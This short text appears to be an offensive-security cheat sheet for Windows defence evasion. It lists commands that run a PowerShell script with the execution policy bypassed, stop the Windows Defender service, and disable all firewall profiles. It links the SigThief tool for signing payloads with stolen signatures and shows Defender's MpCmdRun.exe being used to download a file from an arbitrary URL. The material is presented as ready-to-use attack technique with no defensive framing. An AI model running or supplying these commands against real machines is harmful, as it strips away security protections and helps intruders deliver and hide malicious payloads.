# Requires admin privileges or being able to run a custom powershell sudo ! (sudo.ps1)
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Username\AppData\Local\Temp\sudo_PS1-0.ps1; }"# Stop Windows Defender using cmd.exe
sc stop WinDefend
# Identify firewall profiles for an user
netsh advfirewall show allprofiles
# Disable all firewall profiles for an user
netsh advfirewall set allprofiles state off
# Totally disable the firewall
netsh firewall set opmode disable
Bypass
# SigThief allow to sign a payload binary# by stealing a legit signature
https://github.com/secretsquirrel/SigThief
Downloading
https://twitter.com/mohammadaskar2/status/1301263551638761477?s=19# You can download a file using Windows Defender itself
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url <url> -path <local-path>